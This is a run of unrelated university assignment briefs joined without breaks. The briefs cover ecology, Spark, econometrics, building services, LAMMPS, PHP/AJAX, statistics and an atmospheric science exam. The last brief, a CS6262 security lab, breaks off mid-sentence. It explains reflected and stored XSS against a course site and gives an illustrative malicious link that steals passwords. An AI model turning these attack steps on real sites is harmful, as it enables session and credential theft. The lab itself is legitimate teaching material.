BLGY2220 Evolution, Adaptation, and Behaviour Foraging Practical You have been asked to write a report using the data collected during your foraging laboratory practical. Your report has a 2000 word limit. Submit online (link in “submit my work”) by 12.00 13th March 2025. Here is a recommended structure for your report: · INTRODUCTION (include a hypothesis) · METHODS · RESULTS (I would recommend 2-3 figures to support your statistical tests) · DISCUSSION · REFERENCES · You need to format your assessments using normal margin sizes, and Arial font, size 11pt. In the Minerva folder for this practical you will find an Excel spreadsheet containing your data combined with some from previous years. The data might need some sorting into a form. in which you can use to analyse it. Your task is to answer the overall question: “How does foraging in groups affect individuals?” You’ll want to consider how group size impacts an individual’s chances of survival, through death and energy consumption. You can explain why this occurs by evidencing trade-offs taking place. From this, you’ll have three hypothesis you’ll want to test There are 4 dependent variables that you could use; net seeds eaten (spots of food dye standing in for seeds, seeds – penalties, dead individuals get a 0 rather than negative numbers), seeds consumed per minute, scans made per minute and forager mortality. You need to explore and plot these data and apply appropriate statistical tests. You then need to assess what the results of the tests are telling you and relate that to behaviour of animals in the wild. We will not be telling you how to analyse or plot the data, but you can talk it through with us. HINTS: · Look at feedback from previous modules (e.g. BLGY1325, BLGY1306, BLGY1300, BLGY2155) · Data contains 0, so don’t need to transform. it. Apply non-parametric tests instead. · What type of data do you have? Are they formatted correctly for R? · When are post-hoc tests needed? This is the only help session, so make sure you at least know what you’re going to do with the data by the end. If you haven’t taken level 1 data analysis then make sure the demonstrators know and help you (if you are more used to performing data analysis in R that’s fine).
Assessment 1 – Short Communication Report Environmental Survey and Monitoring: 2024 - 2025 Overview of Short Communication Reports You are to write to short summary reports on a given environmental survey approach that has been undertaken during the course. The reports should outline the study site, aims and objectives, the methods used and briefly an analysis of the results that were gathered. These reports are designed to provide the reader with a concise but informative overview of what you did, the findings and some brief interpretation of the outputs. They are not comprehensive assessments of an approach, but rather an example of the application of an approach to measuring the environment. Guidance The information provided below is for guidance only. You do not have to strictly adhere to every suggestion, but ideally follow the main points: Structure The report should follow the suggested structure: 1. Introduction Introduce the subject area, the concepts behind the monitoring approach and the rationale for the application. You should aim to provide anon-expert a good foundation to understand the remainder of the report and highlight why the approach can be useful for environmental investigations. 2. Methods and Data Describe the application of the survey approach to a set of data or an environmental problem. Here you should describe data collection techniques (either the physical approaches to gathering primary data or the electronic sources), their alternation or transformation if required and the software used for analysis. You should be explicit but brief here – we do not need to know every step of the procedure but should have an idea of what was completed. 3. Results and Analysis Here you should present 1-2 (2 max) key figures (i.e. charts, graphs, illustrations, tables etc) and briefly describe the results and what they mean. In this section it is important to display information clearly and effectively, but do not provide interpretations at this stage. 4. Discussion and Conclusion Concisely, evaluate the findings considering relevant literature (1-2 key references) and reflect on the advantages and disadvantages of the approach in relation to providing information to inform environmental management, policy or other end users of the monitoring approach.
Big Data (H/M) Assessed Exercise Task Sheet 2024/25 – Individual – v1 07/02/25 Summary The goal of this exercise is to familiarize yourselves with the design, implementation and performance testing of Big Data analysis tasks using Apache Spark. You will be required to design and implement a single reasonably complex Spark application. You will then test the running of this application on a large dataset. You will be evaluated based on code functionality (does it produce the expected outcome), code quality (is it well designed and follows good software engineering practices) and efficiency (how fast is it and does it use resources efficiently). We provide you with an initial project template similar to the tutorials that you have been using in the labs. This will contain some classes that you can use in your solution (so you don’t need to implement them yourself). Task Description You are to develop a financial recommendation platform. that can find profitable financial assets and display them as a top-5 ranking for an investor, given pricing information and asset fundamental data. This is a batch analytics task to be implemented in Apache Spark as a pipeline of data transformations and actions. You will be provided a dataset that contains both pricing data and asset metadata up-to a set date, where this is the date that you are going to produce recommendations for, using information on and before that date. The pipeline you need to implement will involve a series of stages: 1. First, the pricing data and asset metadata needs to be loaded in as Resilient Distributed Datasets (RDDs), this is provided for you in the project template. 2. Second, you will need to transform. the daily pricing data into a series of financial ‘Technical Indicators’ that numerically describe how well an asset performed in the past. Classes for calculating these are provided, but you will need to work out how to integrate these into your pipeline of Spark transformations. 3. Third, after you have calculated these technical indicators, you will need to use them to filter the assets. You should filter out any assets that have a Volatility score greater than or equal to 4. 4. Fourth, you will need to further use the provided asset metadata to further filter the asset set to remove assets with a Price-to-Earnings Ratio greater than or equal to 25. 5. Finally, you need to rank the remaining assets for the investor based on asset Returns (Return on Investment) over the most recent 5 days, returning the top 5 assets. What you need to collect at the driver program is an AssetRanking class, which contains an array of 5 Asset objects (i.e. the final ranking), both these classes are provided in the template. All computation should be performed in a distributed manner using Spark transformations and actions. You may need to collect intermediate data at the driver program between stages of your pipeline, but this should only be a small number of records (under 5k), and you should not need to further process the data at the driver. For this exercise, you should implement your transformation functions as Java classes following object-orientated design principles, as illustrated in the tutorials. You can use both the Java core API (those based on JavaRDD) and the Java SQL API (those based on Dataset), but you should avoidsignificant use of lambda expressions (as they make your code less interpretable). You should comment the logic for your code in English; have a look at the tutorial code bases for what this might look like. Template Classes You will be provided with a Java template project like the tutorials. The template project provides implementations of the following code to help you: • AssessedExercise: This is the main class, you should call all of your transformations and actions within the rankInvestments function of this class. • Asset: This class represents a single asset, it is used by AssetRanking, which is the object your program is to return. • AssetFeatures: This class holds the returns, volatility and p/e ratio for an asset. This class is used by Asset. • AssetMetadata: This object contains descriptive metadata about an asset. You will need the name, industry, sector and price-to-earnings ratio from this in your solution. • AssetRanking: An array of Asset, your solution should return one of these with 5 assets. • StockPrice: This class represents the price data for an asset on a particular day. You need the closing price from these to calculate technical indicators. • Returns: This is a class for calculating Return on Investment. The calculate function takes in a number of days to calculate over and a list of close prices sorted by time. numDays should be 5 in your solution. • Volatility: This is a class for calculating asset volatility over a period of time. It takes in a list of close prices sorted by time. For your solution you need to provide it the close prices for the prior year, which is 251 days (we only count trading days since markets are not open on weekends). • NullPriceFilter: This is a simple filtering class that is run on price loading to remove days where close prices are missing. • PriceReaderMap: A simple map that is used to convert from a Spark SQL Row to a StockPrice. • AssetMetadataPairing: This is a Spark SQL Row map that converts the raw asset metadata to a Tuple2 object. The string in this case is the stock ticker/symbol for the asset. • MathUtils: This is a utility class that includes some useful math operations. You don’t need to directly use this, it is used by the Returns and Volatility classes. • TimeUtil: This is a custom utility class I wrote to make parsing dates easier. In the above requirements, you will note that for calculating returns and volatility you will need to filter the input pricing data to a window of time, but the StockPrice object reports the date in the form. of fields. This class allows you to convert from to a Java Instant object, which allows for easier time-based operations. IDE Setup Your integrated development environment (e.g. Eclipse or IntelliJ) should be the same as for the tutorials. However, as this is using the latest version of Apache Spark (4.0.0-preview2) you will need Java JDK 21.0.2, which you can download from https://jdk.java.net/archive/ Dataset The dataset that you will be using for this exercise is a collection of financial assets from the US stock market spanning the period of 1999 to mid-2020. This is split over two data files: • all_prices-noHead.csv: This file contains daily pricing data for around 15,700 financial assets over multiple years. The file contains 24,197,442 price points, and is around 2.4GB in size. • stock_data.json: This is a json file that contains metadata collected about various financial assets, such as their name, industry and price-to-earnings ratio. Not all fields are available for all assets. If you need a field for your solution and an asset is missing that field you should filter that asset out. When and What to hand in The deadline for submission is March 3rd by 4:30pm. You should submit via Moodle: • A copy of your code-base as a single zip file. You should only include the ‘src’ directory in your submission. How this exercise will be marked Following timely submission on Moodle, the exercise will be given a numerical mark between 0 (no submission) and 25 (perfect in every way). The numerical marks will then be converted to a band (A5, A4, etc.). The marking scheme is as follows: • 5 marks are awarded for producing the correct output through computation • 5 marks are awarded for computational efficiency (benchmarked against my solution) • The remaining 15 marks are awarded for the implementation quality o 10 marks are awarded for correct implementation of the classes o 2 marks are awarded for code documentation (comments). o 3 marks are awarded for design that will make yoursolution scale well with more data
Econ 138 Writing Assignment: DUE Mar 3 by 5PM PST on Canvas Please read all instructions both before you begin the assignment and after you complete it. This assignment is meant to be completed individually and independently. You cannot work any other person on this assignment or discuss it with others. You can use ChatGPT or any other generative AI to help you. You can also consult outside sources (online or otherwise) but be careful not to plagiarize (see Academic Integrity section at the end of this document), and you must cite your sources. However, note that you should be able to complete this assignment without any outside sources. Please explain all your answers thoroughly. In this writing assignment, you will analyze racial disparities in a data set about judge overrides in Alabama. These data have been slightly modified for educational purposes on this assignment but are based on real data. These judge overrides occur when a jury sentences a defendant to life in prison, but the judge did not follow their ruling and instead sentenced the defendant to the death penalty. Alabama is the only state that has regularly overridden jury decisions of life in prison in favor of the death penalty. It was also the last state to abolish this practice, ending it only in 2017. However, defendants in cases that were decided before 2017 may still face the death penalty in Alabama after the ruling. You can learn more about judge overrides in Alabama from the Equal Justice Initiative at this link: https://eji.org/reports/judge-override/. Steps: 1. (a) Download the provided Excel data set. What percent of total cases involve a Black defendant? A White defendant? (b) What percent of overridden cases involve a Black defendant? A White Defendant? You can do these by hand or use the “COUNTIFS” function in Excel or any statistical software of your choice. 2. Are the differences you found in Step 1 between the total percentage of cases involving Black defendants and the percentage of overridden cases involving Black defendants sufficient to conclude that judges have racial bias? Explain your answers. (Suggested word count: 200). 3. Sort the data by judge. Find: (a) A judge that you think exhibits evidence consistent with racial bias against Black or White defendants. (b) A judge that is more lenient but unbiased. (c) A judge that is more stringent but unbiased. Explain each of your answers. (Suggested word count: 300 words). 4. (a) What percent of cases overseen by Black judges involve Black defendants? (b) What percent of overridden cases overseen by Black judges involve Black defendants? (c) What percent of cases overseen by White judges involve Black defendants? (d) What percent of overridden cases overseen by White judges involve Black defendants? 5. Are your findings from Step 4 more consistent with statistical discrimination or taste-based discrimination? Use an argument in the style. of Antonovics and Knight (2009) to justify your answer. (Suggested word count: 300 words). 6. Find the percent of total cases with a: (a) Black defendant and White victim (b) Black defendant and Black victim (c) White defendant and Black victim (d) White defendant and White victim 7. Find the percent of overridden cases with a: (a) Black defendant and White victim (b) Black defendant and Black victim (c) White defendant and Black victim (d) White defendant and White victim 8. Building on your findings from steps 6 and 7, describe an analysis or experiment that will allow you to separately identify if judges exhibit bias against Black defendants and bias towards White victims. What other data/information would you need (if any) to perform. this analysis/experiment? Provide a detailed explanation of the steps you would follow and how you would interpret potential results. (Suggested word count: 500 words). Format: 1. You should answer each step as a separate question in the text box provided. You do not need to write an introduction or conclusion. You do not need to restate the questions asked. Focus on the economics; we are not going to judge the quality of your writing (so long as it is readable and relatively typo free), but rather the quality of the economic thought behind them. Write freely and then revise to express your ideas clearly and concisely. 2. Suggested word counts are there as a guide, but we will not take of points for being over/under the word count, so long as you have answered the questions thoroughly and completely. 3. You can write in the first person, using “I” statements. 4. Please follow APA style. when discussing different racial/ethnic groups. Current APA style. recommends using “South Asian people”, “South Asian Americans”, “South Asian folks”, etc. , rather than “South Asians”, for example. Use race/ethnicity in this way as a descriptor rather than as a noun for all groups. Additionally, always capitalize Black, White, Hispanic, Asian, etc. 5. You can cite any outside sources you use in Chicago, MLA, or whatever format you prefer. As long as we can find the source and read it, we won’t take off points for the style. of your bibliography. Note that you should be able to complete this assignment without any outside sources. 6. Grading: The points are distributed across questions as follows. There is partial credit within questions, but no partial credit will be given for answers without evidence or careful reasoning. We will follow the below rubric. There is no partial credit within any of the subsections unless otherwise stated. We will take off 20 points (50%) for late submissions and we reserve the right to take off additional points for assignments that did not follow the formatting guidelines. Step 1 3 pts: part a (1.5 for each %) 3 pts: part b (1.5 for each %) Step 2 4 pts: justification (2 pts partial) Step 3 2 pts: part a 2 pts: part b 2 pts: part c Step 4 1.5 pts: part a 1.5 pts: part b 1.5 pts: part c 1.5 pts: part d Step 5 4 pts: justification (2 pts partial) Step 6 1 pt: part a 1 pt: part b 1 pt: part c 1 pt: part d Step 7 1 pt: part a 1 pt: part b 1 pt: part c 1 pt: part d Step 8 6 pts: justification (2 or 4 pts partial)
Assignment Consider the following 3D equations defined on Ω = (—1, 1) × (—1, 1) × (—1, 1): The boundary conditions are F1 (—1,y, z) = Fb (y, z), F3 (x,—1, z) = Fb (x,z), F5 (x,y,—1) = Fb (x,y), F2 (1,y, z) = F4 (x,1, z) = F6 (x,y, 1) = 0, where • Solve this system of equations numerically for σ = 0.1, 1, 10, 100. • Let m = F1 + F2 + F3 + F4 + F5 + F6 . Assume σ = 1/ϵ . Derive the equation of m that approximates the system of F1 , ··· , F6 up to the first order. Write a report including 1. An introduction to the numerical method used to solve the problem. 2. The numerical settings. 3. Numerical solutions represented by figures. 4. Plots showing the convergence of the iterative method. 5. Derivation of the first-order approximation. Submit your report and your codes to Canvas no later than 4 Apr 2025.
BCPM0073: BUILDING SERVICES ENGINEERING II 1. Introduction: This document includes important information regarding your summative assessment. Please read this document in full and refer to it while preparing your assignment. Please note that this is a INDIVIDUAL coursework, with individual submission at the end. 2. Assessment Brief: Introduction This assignment requires to assess the building services requirements of a given building and to propose appropriate services systems and solutions. Each student has been allocated a building to design its services systems, as indicated below. You are asked to use the building services principles outlined through Building Services I and II courses and your own notes, reading and research, to develop a System Proposal for your case study building. It will be necessary to assess the specific needs of your case study building, and to consider which services will be most appropriate. It is important to give authority to your work by using your lecture notes, current legislation, research and good practice, and referring to standard methods and data. The design documents will be the case study building type, in the form. of freehand sketches drawn by the Architect on a restaurant napkin, together with some more detailed instructions. Current architectural design has limited consideration in Façade Optimisation, so your design should consider the façade improvement, e.g. window area, shading devices, when needed. Although you only need to focus on some systems listed below, your work must also consider the relationships between the various engineering disciplines (i.e. interdisciplinary consideration). The Architects’ sketches do not include stairs, lifts & escalators, riser ducts, toilets or plant areas. You must decide the size, number and location of these, very early in the design programme and incorporate them into your unidisciplinary design. Additionally, you should select the Location of the building (within England) to provide references to the system selection. The location selected should require both heating and cooling for the building. Requirements The following tasks should be covered in this design project, including approximate plant room size and location. 1. Cooling + Ventilation + Façade Optimization 2. Heating + Ventilation + Façade Optimization 3. Electrical Power & Cable Distribution 4. Lighting + Façade Optimization 5. Water Services (Hot and Cold) 6. Drainage (Soil & Waste + Rain Water) You can select either Task 1, or Task 2, or a combination of Tasks 3 and 4, or a combination of Tasks 5 and 6. The tasks are arranged in related pairs and you are NOT at liberty to change the combination. For your final submission, please DO CHECK the Resolution, especially design drawings, to make sure the contents in your report can be seen clearly by the markers. The report shall expand on the topics and shall include system selection criteria; relevant design drawings; relevant research; current installation techniques and references. You are expected to analyse the building conditions, develop your analysis to arrive at a suitable services solution, justify your proposals and show how your proposals link with other services and fit into the building. Detailed plant, distribution and equipment sizes, however, are NOT required. Your analysis shall deal with the impact of the proposals on the building, relevant legislation, sustainability issues, etc. Plant room locations and their approximate sizes are required, together with main distribution routes and risers for each group of services. The 3R’s – rooms, routes & risers – shall be shown for each task. 3. Use of AI: The following category of AI can/cannot be used: Category 1 – AI cannot be used. X Category 2 – AI tools can be used in an assistive role. Category 3 – AI has an integral role. For examples of each category please go to Using AI tools in assessment Category 2 - Students are permitted to use AI tools for specific defined processes to support the development of specific skills as required by the assessment, such as data analysis, transcription, and translation, generating insights, giving feedback on content, or proofreading content. Students must acknowledge where they have used AI within their coursework.
CHEN E4880 – Atomistic Simulations Project 1: Properties of an Elemental Transition Metal (Due on February 27, 2025 at 11:59 PM) Transition metals are of great technological relevance for the chemical industry due to their unique properties and versatility in various applications, including catalysts, magnetic materials, and electronics. In this project, you will explore the properties of an elemental transition metal, for now, in the absence of temperature or pressure. The technical objective of this project is to familiarize yourself with the LAMMPS software and its input/output file formats. Scientific objectives are to find the ground-state energy, lattice parameter, vacancy formation energy, and one surface energy of a face-centered cubic (FCC) transition metal. As you work through the project, you will also learn about the importance of convergence parameters and the limitations of interatomic potentials used in atomic-scale simulations. Geometry optimizations (relaxations) In nature, a crystal in equilibrium is automatically in the lowest energy (ground-state) configuration. The ground-state lattice parameters and atomic positions define the ground-state lattice geometry that minimizes the lattice energy. The ground-state lattice parameters are generally not known a priori. Given a reasonable guess, we can perform. a geometry optimization, also sometimes called relaxation, that finds the lowest energy configuration by adjusting the atomic positions and lattice parameter(s) until an energy minimum is found. Vacancy formation energy The vacancy formation energy Ev is defined as the energetic cost to remove an atom from a lattice site and reinsert it into the bulk of the material. This leads to the energy difference where Ebulk and EN - 1 are the energies of the perfect bulk structure with Nbulk atoms and the defect structure with one vacancy containing (N − 1) atoms, respectively. By evaluating the bulk energy per atom (Ebulk /Nbulk) and multiplying by the number of atoms in the vacancy structure (N − 1), we obtain the bulk energy of (N − 1) atoms and can compare the two structures. Surface energy The surface energy is the energy required to truncate an infinitely extended crystal along a specific lattice plane. Calculating surface energies follows a similar overall approach to calculating vacancy formation energies, but different convergence parameters must be considered. Surface relaxations and pair potentials The following equation gives the Lennard-Jones potential Pair potentials, such as the Lennard-Jones potential, show outward surface relaxations, which disagrees with experimental observation. 1. Lattice constant of elemental platinum a. Calculate the lattice constant (in Å) and total energy (in eV) using the supplied LJ potential. First, use LAMMPS’ built-in minimizer (input file lmp-in.1a-relax), then find the lattice constant by manually adjusting the lattice parameter (input file lmp-in.1a-single). Start with a lattice parameter close to the relaxed lattice parameter. Plot the energy as a function of the lattice parameter from above to below the optimized value (Figure 1) and identify the equilibrium lattice constant. Hint: See the project guide for an explanation of the LAMMPS input format. b. Repeat the calculations, both automated and manual (Figure 2), for the supplied embedded- atom model (EAM) potential (input file: lmp-in.1b-single). Hint: Don’t forget to upload the EAM potential file to nanoHUB. c. How do the calculated lattice constants compare to the experimental value? d. Which potential agrees better with experiment? Is this result expected? Explain your answer. Hint: Consider how the different potentials were constructed (see table below). 2. Vacancy formation energy of Pt a. Compute the vacancy formation energy (in eV) with the provided LJ potential as a function of the supercell size. Do not relax the atomic positions after taking out an atom. Perform a convergence test and plot the energy against the convergence parameter (Figure 3). b. Calculate the ratio of the vacancy formation energy to the cohesive energy per atom. Document how you calculated the cohesive energy. Hints: The (conventional) FCC unit cell contains 4 atoms. Use the optimized LJ lattice parameter from problem 1. c. Repeat your calculation, but relax the atomic positions after creating the vacancy. Perform another convergence test and add results to Figure 3. Describe how the vacancy formation energy changes compared to the unrelaxed calculations. Hint: Adjust your LAMMPS input file for relaxations (see problem 1). d. Now compute the vacancy formation energy using the provided EAM potential. Do it as accurately as you can. Report your convergence test (Figure 4). Use what you learned in parts a. and b. Hint: Use the optimal EAM lattice parameter from problem 1 as the initial value. e. Without relaxation, the absolute value of the ratio of the vacancy formation energy to the cohesive energy per atom equals 1 for the Lennard-Jones potential. Explain why. f. Why does the vacancy formation energy decrease when the atoms are allowed to relax? 3. Surface energy of the Pt(100) facet a. Which two convergence parameters need to be considered for surface slab calculations? b. Compute the surface energy of the Pt(100) surface using the LJ potential. Document your approach. Perform. and plot convergence tests (Figure 5). Report your result in meV/Ǻ2 . c. Repeat with the EAM potential, including convergence tests (Figure 6). Please do not perform. relaxations for problem 3. 4. Conceptual understanding a. Calculate the distance r/ where the LJ potential reaches its minimum (Derivation 1). Express r/ in terms of ε and σ , and evaluate using the values from your calculations. b. Determine the nearest-neighbor distance dNN in the optimized structure of problem 1 (Derivation 2). c. Why is dNN different from r/ ? d. Why are numerical simulations needed even for simple models such as the LJ potential? 5. Short answers a. For what class of compounds are Lennard-Jones potentials most suitable (name 1 example)? b. For what class of compounds/materials are EAM potentials most suitable (name 1 example)? c. Name 1 example of materials/interactions for which neither LJ nor EAM are appropriate. d. Assignment 1. Perform. the simulations described on the previous page. 2. Document your work in a two-page memo. a. Address all questions. b. Highlight key results (lattice parameters, energies, etc.). c. Refer to all figures and derivations. d. Keyword style. is fine if the presentation is clear. 3. Include Figures 1–6 and Derivations 1 and 2 in the appendix. Pictures of hand-written notes are fine for derivations. 4. For problems 1–3, include examples of your input files in the appendix. Make sure to follow the formatting guidelines. Limit the text portion of your report to no more than two pages. Provided Files File Description Comment lmp-in.1a-single LAMMPS input file for a single point calculation of FCC Pt using a Lennard-Jones potential lmp-in.1a-relax LAMMPS input file for geometry optimizations (relaxations) using a Lennard-Jones potential lmp-in.1b-single LAMMPS input file for a single point calculation of FCC Pt using an EAM potential EAM potential file required lmp-in.1b-relax LAMMPS input file for geometry optimizations (relaxations) using an EAM potential EAM potential file required Pt-Adams1989.eam EAM potential for Pt. This potential was published in Adams et al., J. Mater. Res. 4, 102-112 (1989) and can be obtained from http://www.ctcms.nist.gov/potentials The Lennard-Jones potential parameters (ε = 0.200 eV; σ = 2.540 Å) were determined by a fit to the lattice constant and the vacancy formation energy. The EAM potential was fitted to sublimation energies, elastic constants, and vacancy formation energies. Problems 2 and 3: We do not provide separate files for Problems 2 and 3. Use the files provided for problem 1 and start from there. See the project guide for hints regarding creating vacancies and surface slab models.
COMPX322-25A Assignment One Due Date: Monday March 24th, 10am Asynchronous Event Viewer PART ONE For this coursework you are to implement a web application that displays information about local events. Your implementation will require use of the following: Validated HTML Cascading Style. Sheets (CSS) JavaScript DHTML Server‐side PHP scripting Interaction with a MySQL database AJAX and Fetch Retrieval of data from an external API Application description The minimum requirements for the application are as follows: • it consists of a single html page with a separate CSS document to control layout and appearance • when the page is first loaded it shows a list of local events, this must use an AJAX request to get data from a MySQL database • clicking on one of the event names will display full information for that event, retrieved via another AJAX request • a user can request weather information for the event location, this is retrieved from OpenWeatherMap () using a fetch request • a user is able to update event information by entering new text, this must be done with an AJAX request • a user can return to the home page, which refreshes the event list, using an AJAX request • all functionality is achieved within a single page (url) without the user needing to refresh the page in their browser or navigate to a new page. This is where the use of asynchronous requests and DHTML is essential What you need to do (in whichever order you think appropriate) a) Create a free account athttps://openweathermap.org/(you can use the “Current weather API” for free, 60 API call/minute, 1,000,000 calls/month) b) Import the provided MySQL table into your database: event.sql c) Design and implement the layout of your web page using well-formed and valid HTML in combination with one or more CSS stylesheets which should be stored in separate file(s). d) Implement PHP scripts to retrieve and add the data needed by your application e) Implement any required JavaScript. code that is needed to support your application. This includes code to handle asynchronous AJAX and fetch requests and responses to and from the server. Make sure you follow the instructions above for the use of AJAX and fetch. Keep your JavaScript. code in a separate file. f) NOTE: your PHP scripts should return data to your HTML page using AJAX or Fetch, you should not display content directly from your PHP scripts Important - for this assignment you must not use JavaScript libraries (e.g. JQuery) What to submit and how Your code for this assignment must be submitted electronically on Moodle. Make sure your connection scripts are set for use in the lab environment. Assuming that all parts of your application are within a directory called compx322assn1 within your course_html directory Compress the directory into compx322assn1.tar.gz (or gzip or zip) Upload the compressed file to the Assignment One link on Moodle. No other mechanism for submission will be accepted. Make sure all work submitted is your own, you should be familiar with the University regulations on plagiarism. You are free to discuss solutions with your classmates but this is an individual assignment so you should prepare all of the code on your own. This also means you should not use AI solutions to write your code. How your work will be assessed The assignment will be marked out of 100 as follows: • Application meets minimum functional requirements 30 marks • Asynchronous requests are used to retrieve, update and display all data without a page reload 25 marks • AJAX and fetch are used for the requests as required 10 marks • PHP scripts correctly handle data and interact with MySQL server 15 marks • HTML/CSS used appropriately to create usable layout and clear presentation 10 marks - correct use of HTML elements - CSS used for functional and design purposes • All code is suitably commented 10 marks TOTAL 100 marks Oral Assessment Component For each assignment a group of students may be randomly selected to give a short oral presentation to explain your code and describe your solution. Selected students will be contacted after the submission date to arrange this. Note: marks will be deducted if we have to edit your PHP scripts to correctly connect to the UoW MySQL server so make sure you test in that environment and submit code that will successfully connect.
STA130 Project Proposal Research Question #1 Question: [State your research question clearly in one sentence] Which variable(s) will you use to explore this question? [list the variables here both the name in the data dictionary as well as a description for each variable. If your analysis involves specific variables taking on specific roles, such as an x-variable and a y-variable, make clear which variables correspond to which roles.] Which method of analysis do you propose using? [State the specific statistical method you plan on using to address this question (refer to the table in the Proposal Assignment on Quercus.] Visual Representation: [How do you plan to visualize the results? Which type of plot/graph would be most appropriate? You can include a sketch here to show what you would put on each axis, etc.] Relevance to Wellspring: [2-3 sentences explaining how answering this question would help Wellspring better serve their community or understand their impact. Be specific about what insights or decisions this could inform.] Research Question #2 Question: [State your research question clearly in one sentence] Which variable(s) will you use to explore this question? [list the variables here both the name in the data dictionary as well as a description for each variable. If your analysis involves specific variables taking on specific roles, such as an x-variable and a y-variable, make clear which variables correspond to which roles.] Which method of analysis do you propose using? [State the specific statistical method you plan on using to address this question (refer to the table in the Proposal Assignment on Quercus.] Visual Representation: [How do you plan to visualize the results? Which type of plot/graph would be most appropriate? You can include a sketch here to show what you would put on each axis, etc.] Relevance to Wellspring: [2-3 sentences explaining how answering this question would help Wellspring better serve their community or understand their impact. Be specific about what insights or decisions this could inform.] Research Question #3 Question: [State your research question clearly in one sentence] Which variable(s) will you use to explore this question? [list the variables here both the name in the data dictionary as well as a description for each variable. If your analysis involves specific variables taking on specific roles, such as an x-variable and a y-variable, make clear which variables correspond to which roles.] Which method of analysis do you propose using? [State the specific statistical method you plan on using to address this question (refer to the table in the Proposal Assignment on Quercus.] Visual Representation: [How do you plan to visualize the results? Which type of plot/graph would be most appropriate? You can include a sketch here to show what you would put on each axis, etc.] Relevance to Wellspring: [2-3 sentences explaining how answering this question would help Wellspring better serve their community or understand their impact. Be specific about what insights or decisions this could inform.]
Fluid dynamics of Earth Atmosphere and Climate - Midterm exam - March 2015 Please write your name on each page. 1. Consider an air parcel at T = 300K and ρ = 1kg m-3 . a. Determine the air pressure using the ideal gas law. b. If the parcel contains 10 gram of water vapor per kilo of dry air, determine the partial pressure of water vapor. c. How much water vapor should be added to this air parcel to bring it to saturation, knowing that the saturation vapor pressure at 300K is es = 3500Pa. (The ideal gas constant for dry air is Rd = 287JK-1kg-1 . The ideal gas constant for water vapor is Rv = 460JK-1kg-1.) Please clearly write down the formulas you are using for the computation. You need only to carry the computation to the first two digits. 2. Below is a reproduction of the figure 2.7 from the textbook showing the energy fluxes in the simple greenhouse model. a. Briefly define each terms (namely Ta , Ts , S , A, S0 and α) shown in the figure. b. What is the physical law that relates the radiation flux A and S to the temperature of the atmosphere and surface? c. Write the energy budget for the Earth surface, for the atmospheric layer and for the whole planet (surface and atmosphere combined) as described by the figure. d. Determine the temperature of the surface as function of the incoming solar radiation S0 and the albedo α . 3.a. Explain the concept of buoyancy. b. Write the expression for the buoyancy of an air parcel as function of its density p and that of the environment e. c. By taking advantage of the ideal gas law, express the buoyancy of an air parcel as function of its temperature. (You can assume that the parcel pressure is the same as that of the environment.) d. What is the acceleration in a hot air ballon filled with warm air at T = 360K while the outside air is at T = 300? If the mass of air in the ballon is 1000kg, how much additional weight can it carry in the basket? 4. For an adiabatic parcel, the first law of thermodynamics can be written as where Cp = 1000 JK-1kg-1 is the heat capacity of dry air at constant pres- sure, T is the parcel temperature, g = 10ms-2 is the gravitational accelera- tion, and Z is its altitude. a. From this equation, derive the adiabatic lapse rate. b. Provide a physical explanation as to why the temperature decreases as an air parcel rises (in other words, explain the concept of the adiabatic lapse rate to one of your friend who has not taken the course.) c. Inside a cloud, equation (1) does not hold any more. Discuss how conden- sation afects the adiabatic ascent? d. How would you modify equation (1) to account fro the efect of conden- sation?
You can find the due date and how to turn in your solution located on the Canvas assignment page and Ed discussion. You’ve been invited to the CS6262 security club; welcome! The security club has a new official website we use for sharing information and resources. Unfortunately, the last administrator was too busy and didn’t perform any security audits on the website. Oh no!The club’s security team wants you, the club’s newest member, to deliver a full security audit of our new official website. You’ve been tasked to provide a pen-testing report to the club’s security team. You’ve received this message to start you off:“Hi there! The club’s website can be found at https://cs6262.gtisc.gatech.edu. We’ve integrated the GT Single-Sign-On service, so please sign in with your GT account and it will create a user for you. The website is not complicated. It is a simple Content Management System (CMS) with several features enabled, e.g., text search, dark mode, rich text editor, etc. Good luck auditing! The CS6262 Security Team” Let’s first orient ourselves on the website. The project website is located at cs6262.gtisc.gatech.edu – type this into your browser. We recommend using the latest version of Google Chrome. To trigger an XSS attack on the admin side, fill in the URL of your post and submit to the admin role. It will create or override the current running browser instance, which means when it’s messed up, you can submit a URL to override the current one. To trigger an XSS attack on other users’ sides, fill in the URL of your malicious payload. The user instances also override the current one when you submit new URLs. The admin instance will be used for task 4 and task 5.2. The user instance will be used for task 5.3. iii. Check “Restart the ReDoS instance” to launch the ReDoS server again when you feel like the server is not responding to your submission. Here are the two approaches. Note: Fill up the questionnaire and submit required files onto GradeScope. Modern browsers will provide DevTools for front-end developers to debug and tune the performance when developing a website. Attackers can also use these tools to explore and collect information. Open your Chrome and press F12 to open the developer console. DevTools will popup. Here you can run JavaScript in the console, view the source html of the webpage, capture the network traffic, and other functionalities. Try to explore it by yourself. 1.2 console.log() console.log() is commonly used to print information into the console of the developer tools for debugging purposes. Open the devTool and type console.log(“yourGTID”); You can see your GTID is printed in the console. 1.3 setInterval setInterval is used to fire a function given a frequency. It will return an intervalID which can be passed to clearInterval to cancel the interval. Question: Given a variable var counter = 5, make use of setInterval and clearInterval to reduce thecounter to 0 in every second and then stop. You can run your code in devTools to verify. var counter = 5;// Your code below 1.4 setTimeout setTimeout will fire a function after the delay milliseconds. The function will only be fired once. Similarly you can use the returned timeoutID and clearTimeout to cancel the timeout. Question: Given a variable var counter = 5, make use of setTimeout to reduce the counter to 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below 1.5 Promise A Promise is an object used for async operations in JavaScript. There are three states in a Promise object: Pending, Fulfilled, and Rejected. Once created, the state of the Promise object is pending. So the calling function will not be blocked and continue executing. The Promise object will eventually be fulfilled or rejected. Then the respective resolve or reject function will be called. Below is an example of a Promise. Before running the code, can you tell what the output would be? Can you explain why? Which of the following options can adjust iframe’s width and height correctly? FAQ Please make sure that you have correctly set your username in the questionnaire. Find where to exploit a reflected XSS and fill in the questionnaire URL by visiting which an alert should trigger. Reflective XSS is an attack where a website does not return requested data in a safe manner.Reflective is generally an XSS attack where the attacker sends the victim a link to a reputable website. BUT, this link contains malicious javascript code. For example, https://www.facebook.com/login?username=username&password=passwordsteal-yourinformation.jsIf the website returns the data in an unsafe manner (does not sanitize the output) and the victim clicks on this link, then the malicious code will be executed in the context of the victim’s session. The content of the alert doesn’t matter. For example, https://cs6262.gtisc.gatech.edu/endpoint…yourpayload is what you need to fill in the questionnaire. The autograder will visit your URL. If it detects an alert, then you will receive full credit. After finding the exploitable place from task 2, you understand you can infect others by sending them links. But sending links is costly and people may not click on them every time. Therefore, instead of sending a link required in task 2, you find you can actually modify the 